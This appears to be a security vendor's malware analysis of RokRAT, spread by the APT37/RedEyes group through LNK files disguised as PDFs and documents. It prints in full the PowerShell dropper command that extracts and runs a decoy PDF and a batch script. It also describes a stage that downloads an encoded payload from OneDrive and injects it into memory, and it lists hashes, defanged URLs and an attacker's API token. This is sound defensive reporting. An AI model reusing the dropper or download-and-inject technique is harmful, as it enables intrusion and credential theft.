RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft)

AhnLab Security Emergency response Center (ASEC) confirmed that the RedEyes threat group (also known as APT37, ScarCruft), which distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month, has also recently distributed the RokRAT malware through LNK files.

RokRAT is malware that is capable of collecting user credentials and downloading additional malware. The malware was once distributed through HWP and Word files. The LNK files that were discovered this time contain PowerShell commands that can perform malicious behavior by creating and executing a script file along with a normal file in the temp folder. The confirmed LNK filenames are as follows:

  • 230407Infosheet.lnk
  • April 29th 2023 Seminar.lnk
  • 2023 Personal Evaluation.hwp.lnk
  • NK Diplomat Dispatch Selection and Diplomatic Offices.lnk
  • NK Diplomacy Policy Decision Process.lnk

The “230407Infosheet.lnk” file is disguised with a PDF icon and contains a malicious PowerShell command.

Figure 1. Properties of the LNK file

The LNK file contains not only a PowerShell command, but also the data of a normal PDF file along with malicious script codes. Furthermore, there are dummy bytes that start from 0x89D9A all the way to 0x141702A.

Figure 2. Dummy data that exists at the end of the LNK file

The PowerShell command that is executed through cmd.exe upon executing the LNK file is as follows:

/c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match ‘System32’ -or $dirPath -Match ‘Program Files’) {            $dirPath = ‘%temp%’            }; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00014A0DC4} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00561396 -ReadCount 00561396; $pdfPath = ‘%temp%\230407정보지.pdf’; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002474)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00564634 -ReadCount 00564634; $exePath = ‘%temp%\230412.bat’; sc $exePath ([byte[]]($exeFile ^| select -Skip 00561396)) -Encoding Byte; ^& $exePath;

The LNK file is read up to 0x890F4 and is saved and executed with the filename “230407Infosheet.pdf” in the Temp folder while excluding the first 0x9AA. Afterward, it reads up to 0x89D9A of the LNK file and is saved and executed in the Temp folder with the filename “230412.bat” after excluding 0x890F4, which is the byte where the PDF data exists.

Figure 3. PDF data located at 0x9AA of the LNK file

Figure 4. Script code located at 0x890F4 of the LNK file

Figure 5. Files created in the Temp folder

The threat actor executes a normal PDF file to make the behavior appear normal before carrying out their malicious behavior through the script file.

Figure 6. 230407Infosheet.pdf (normal file)

The script file executed at the same time contains the following PowerShell command that executes malicious commands which exist as HEX values.

Figure 7. 230412.bat

The final PowerShell command that is executed downloads the encoded data from hxxps://api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/content, decodes it, and injects it into the PowerShell process to perform malicious behavior.

Figure 8. Final PowerShell command that is executed

Figure 9. Malicious file uploaded to OneDrive

The injected data is the RokRAT malware that is capable of collecting user credentials and downloading additional malware. The collected information is sent to the threat actor’s cloud server using cloud services such as pcloud and yandex. The UserAgent in the request header is disguised as Googlebot. The certificate token used to send files is as follows:

  • Authorization: Bearer RSbj7Zk5IYK5ThSbQZH4YBo7ZxiPOCH94RBbFuU9c04XXVJg7xbvX

The additional normal files executed through the malicious LNK are as follows:

Figure 10. April 29th 2023 Seminar.pdf created through April 29th 2023 Seminar.lnk

Figure 11. 230402.hwp created through NK Diplomacy Policy Decision Process.lnk

As RokRAT has been in distribution for a while and is being distributed in various forms such as Word files, users are advised to take extra caution.

[File Detection]
Dropper/LNK.Agent (2023.04.08.00)
Downloader/BAT.Agent (2023.04.08.00)

0f5eeb23d701a2b342fc15aa90d97ae0 (LNK)
aa8ba9a029fa98b868be66b7d46e927b (LNK)
657fd7317ccde5a0e0c182a626951a9f (LNK)
be32725e676d49eaa11ff51c61f18907 (LNK)
8fef5eb77e0a9ef2f97591d4d150a363 (bat)
461ce7d6c6062d1ae33895d1f44d98fb (bat)
hxxps://!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/content hxxps://!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBdTJteTF4aDZ0OFhnUjJNem1zOG5oUndvLTZCP2U9akhIQzZ5/root/content hxxps://!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSjE/root/content

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

5 3 votes
Article Rating
Notify of

Inline Feedbacks
View all comments

[…] adversary, also known as APT37, Reaper, and Ricochet Chollima, has since also utilized LNK files to distribute the RokRAT malware, which is capable of collecting user credentials and downloading additional […]


[…] few days ago, AhnLab disclosed the use of LNK files as decoys to activate the infection sequences, where the files use PowerShell […]


[…] this blogpost, another report containing a technical analysis of one of the ROKRAT campaigns was published. While it overlaps with our findings to some extent, we believe that our report provides important […]